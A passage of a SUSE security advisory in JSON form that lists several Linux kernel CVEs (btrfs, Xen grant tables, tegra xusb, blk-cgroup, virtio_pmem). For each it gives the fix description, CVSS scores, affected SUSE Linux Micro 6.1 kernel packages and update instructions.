"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2023-54076"
},
{
"cve": "CVE-2023-54080",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54080"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: zoned: skip splitting and logical rewriting on pre-alloc write\n\nWhen doing a relocation, there is a chance that at the time of\nbtrfs_reloc_clone_csums(), there is no checksum for the corresponding\nregion.\n\nIn this case, btrfs_finish_ordered_zoned()\u0027s sum points to an invalid item\nand so ordered_extent\u0027s logical is set to some invalid value. Then,\nbtrfs_lookup_block_group() in btrfs_zone_finish_endio() failed to find a\nblock group and will hit an assert or a null pointer dereference as\nfollowing.\n\nThis can be reprodcued by running btrfs/028 several times (e.g, 4 to 16\ntimes) with a null_blk setup. The device\u0027s zone size and capacity is set to\n32 MB and the storage size is set to 5 GB on my setup.\n\n KASAN: null-ptr-deref in range [0x0000000000000088-0x000000000000008f]\n CPU: 6 PID: 3105720 Comm: kworker/u16:13 Tainted: G W 6.5.0-rc6-kts+ #1\n Hardware name: Supermicro Super Server/X10SRL-F, BIOS 2.0 12/17/2015\n Workqueue: btrfs-endio-write btrfs_work_helper [btrfs]\n RIP: 0010:btrfs_zone_finish_endio.part.0+0x34/0x160 [btrfs]\n Code: 41 54 49 89 fc 55 48 89 f5 53 e8 57 7d fc ff 48 8d b8 88 00 00 00 48 89 c3 48 b8 00 00 00 00 00\n \u003e 3c 02 00 0f 85 02 01 00 00 f6 83 88 00 00 00 01 0f 84 a8 00 00\n RSP: 0018:ffff88833cf87b08 EFLAGS: 00010206\n RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\n RDX: 0000000000000011 RSI: 0000000000000004 RDI: 0000000000000088\n RBP: 0000000000000002 R08: 0000000000000001 R09: ffffed102877b827\n R10: ffff888143bdc13b R11: ffff888125b1cbc0 R12: ffff888143bdc000\n R13: 0000000000007000 R14: ffff888125b1cba8 R15: 0000000000000000\n FS: 0000000000000000(0000) GS:ffff88881e500000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00007f3ed85223d5 CR3: 00000001519b4005 CR4: 00000000001706e0\n Call Trace:\n \u003cTASK\u003e\n ? die_addr+0x3c/0xa0\n ? exc_general_protection+0x148/0x220\n ? asm_exc_general_protection+0x22/0x30\n ? btrfs_zone_finish_endio.part.0+0x34/0x160 [btrfs]\n ? btrfs_zone_finish_endio.part.0+0x19/0x160 [btrfs]\n btrfs_finish_one_ordered+0x7b8/0x1de0 [btrfs]\n ? rcu_is_watching+0x11/0xb0\n ? lock_release+0x47a/0x620\n ? btrfs_finish_ordered_zoned+0x59b/0x800 [btrfs]\n ? __pfx_btrfs_finish_one_ordered+0x10/0x10 [btrfs]\n ? btrfs_finish_ordered_zoned+0x358/0x800 [btrfs]\n ? __smp_call_single_queue+0x124/0x350\n ? rcu_is_watching+0x11/0xb0\n btrfs_work_helper+0x19f/0xc60 [btrfs]\n ? __pfx_try_to_wake_up+0x10/0x10\n ? _raw_spin_unlock_irq+0x24/0x50\n ? rcu_is_watching+0x11/0xb0\n process_one_work+0x8c1/0x1430\n ? __pfx_lock_acquire+0x10/0x10\n ? __pfx_process_one_work+0x10/0x10\n ? __pfx_do_raw_spin_lock+0x10/0x10\n ? _raw_spin_lock_irq+0x52/0x60\n worker_thread+0x100/0x12c0\n ? __kthread_parkme+0xc1/0x1f0\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x2ea/0x3c0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x30/0x70\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1b/0x30\n \u003c/TASK\u003e\n\nOn the zoned mode, writing to pre-allocated region means data relocation\nwrite. Such write always uses WRITE command so there is no need of splitting\nand rewriting logical address. Thus, we can just skip the function for the\ncase.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54080",
"url": "https://www.suse.com/security/cve/CVE-2023-54080"
},
{
"category": "external",
"summary": "SUSE Bug 1256367 for CVE-2023-54080",
"url": "https://bugzilla.suse.com/1256367"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54080"
},
{
"cve": "CVE-2023-54081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxen: speed up grant-table reclaim\n\nWhen a grant entry is still in use by the remote domain, Linux must put\nit on a deferred list. Normally, this list is very short, because\nthe PV network and block protocols expect the backend to unmap the grant\nfirst. However, Qubes OS\u0027s GUI protocol is subject to the constraints\nof the X Window System, and as such winds up with the frontend unmapping\nthe window first. As a result, the list can grow very large, resulting\nin a massive memory leak and eventual VM freeze.\n\nTo partially solve this problem, make the number of entries that the VM\nwill attempt to free at each iteration tunable. The default is still\n10, but it can be overridden via a module parameter.\n\nThis is Cc: stable because (when combined with appropriate userspace\nchanges) it fixes a severe performance and stability problem for Qubes\nOS users.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54081",
"url": "https://www.suse.com/security/cve/CVE-2023-54081"
},
{
"category": "external",
"summary": "SUSE Bug 1256361 for CVE-2023-54081",
"url": "https://bugzilla.suse.com/1256361"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54081"
},
{
"cve": "CVE-2023-54083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54083"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nphy: tegra: xusb: Clear the driver reference in usb-phy dev\n\nFor the dual-role port, it will assign the phy dev to usb-phy dev and\nuse the port dev driver as the dev driver of usb-phy.\n\nWhen we try to destroy the port dev, it will destroy its dev driver\nas well. But we did not remove the reference from usb-phy dev. This\nmight cause the use-after-free issue in KASAN.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54083",
"url": "https://www.suse.com/security/cve/CVE-2023-54083"
},
{
"category": "external",
"summary": "SUSE Bug 1256368 for CVE-2023-54083",
"url": "https://bugzilla.suse.com/1256368"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54083"
},
{
"cve": "CVE-2023-54088",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54088"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: hold queue_lock when removing blkg-\u003eq_node\n\nWhen blkg is removed from q-\u003eblkg_list from blkg_free_workfn(), queue_lock\nhas to be held, otherwise, all kinds of bugs(list corruption, hard lockup,\n..) can be triggered from blkg_destroy_all().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54088",
"url": "https://www.suse.com/security/cve/CVE-2023-54088"
},
{
"category": "external",
"summary": "SUSE Bug 1256263 for CVE-2023-54088",
"url": "https://bugzilla.suse.com/1256263"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54088"
},
{
"cve": "CVE-2023-54089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio_pmem: add the missing REQ_OP_WRITE for flush bio\n\nWhen doing mkfs.xfs on a pmem device, the following warning was\n\n ------------[ cut here ]------------\n WARNING: CPU: 2 PID: 384 at block/blk-core.c:751 submit_bio_noacct\n Modules linked in:\n CPU: 2 PID: 384 Comm: mkfs.xfs Not tainted 6.4.0-rc7+ #154\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996)\n RIP: 0010:submit_bio_noacct+0x340/0x520\n ......\n Call Trace:\n \u003cTASK\u003e\n ? submit_bio_noacct+0xd5/0x520\n submit_bio+0x37/0x60\n async_pmem_flush+0x79/0xa0\n nvdimm_flush+0x17/0x40\n pmem_submit_bio+0x370/0x390\n __submit_bio+0xbc/0x190\n submit_bio_noacct_nocheck+0x14d/0x370\n submit_bio_noacct+0x1ef/0x520\n submit_bio+0x55/0x60\n submit_bio_wait+0x5a/0xc0\n blkdev_issue_flush+0x44/0x60\n\nThe root cause is that submit_bio_noacct() needs bio_op() is either\nWRITE or ZONE_APPEND for flush bio and async_pmem_flush() doesn\u0027t assign\nREQ_OP_WRITE when allocating flush bio, so submit_bio_noacct just fail\nthe flush bio.\n\nSimply fix it by adding the missing REQ_OP_WRITE for flush bio. And we\ncould fix the flush order issue and do flush optimization later.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54089",
